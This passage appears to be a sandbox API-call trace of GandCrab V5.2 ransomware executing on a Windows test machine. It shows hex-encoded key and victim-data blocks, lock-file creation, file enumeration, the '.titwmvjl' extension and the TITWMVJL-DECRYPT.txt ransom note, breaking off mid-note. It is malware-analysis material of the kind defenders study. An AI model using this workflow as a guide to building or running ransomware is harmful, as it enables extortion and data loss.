45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.230] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0091.231] CloseHandle (hObject=0x2ac) returned 1 [0091.231] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.231] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.232] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x228)) [0091.232] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.232] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.232] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.232] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock") returned 74 [0091.232] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0091.234] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.234] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\") returned 50 [0091.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*" [0091.234] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5035b8 [0091.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.235] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.236] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.236] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0091.236] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0091.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock" [0091.236] lstrlenW (lpString=".titwmvjl") returned 9 [0091.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock") returned 74 [0091.236] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.236] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 83 [0091.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\d2ca4a09d2ca4deb61a.lock") returned 74 [0091.236] lstrlenW (lpString=".lock") returned 5 [0091.236] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.236] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0091.236] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.236] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.237] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0091.237] lstrcmpW (lpString1="My Notebook", lpString2=".") returned 1 [0091.237] lstrcmpW (lpString1="My Notebook", lpString2="..") returned 1 [0091.237] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\", lpString2="My Notebook" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook" [0091.237] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\" [0091.237] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.238] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.238] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.238] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\\\TITWMVJL-DECRYPT.txt") returned 83 [0091.238] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0091.248] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\